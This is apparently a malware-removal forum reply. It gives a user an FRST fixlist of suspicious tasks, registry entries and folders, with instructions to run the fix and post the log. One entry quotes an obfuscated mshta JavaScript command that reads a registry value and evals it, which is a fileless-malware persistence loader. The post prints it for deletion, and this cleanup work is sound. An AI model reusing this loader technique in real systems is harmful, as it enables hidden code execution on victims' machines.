CustomCLSID: HKU\S-1-5-21-2825370636-608562156-754786092-1001_Classes\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\InprocServer32 -> C:\Users\Sina\AppData\Local\Okscics\kkpxymnr.dll => No File
Task: {49280085-8DA9-407C-8B47-AD495E095E44} - \TweakBit\PCRepairKit\Time for deal -> No File <==== ATTENTION
Task: {65C3DF99-6F5C-40EB-A7DD-43C86040ADD2} - \TweakBit\PCRepairKit\Start PCRepairKit ?n logon -> No File <==== ATTENTION
Task: {6863A091-5E32-4B04-BAC1-F66E0B5A919D} - \WPD\SqmUpload_S-1-5-21-2825370636-608562156-754786092-1001 -> No File <==== ATTENTION
Task: {EAE79E53-F905-4206-9841-78467CAE05D4} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe <==== ATTENTION
HKU\S-1-5-21-2825370636-608562156-754786092-1001\Software\Classes\93c0: "C:\WINDOWS\system32\mshta.exe" "javascript:MR1mk5NU="no6";P0v=new ActiveXObject("WScript.Shell");HHFLd2gE="k1t1xzc";vsH3c2=P0v.RegRead("HKCU\\software\\xexfhx\\dcure");xKum8e="I9";eval(vsH3c2);g8VHic="AE";" <===== ATTENTION
C:\Users\Sina\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\192b.lnk
C:\Users\Sina\AppData\Local\Okscics
C:\Program Files\Reimage

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

Restart the computer normally to reset the registry.

The tool will create a log (Fixlog.txt) please post it to your reply.

Please let me know what problem persists with this computer.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users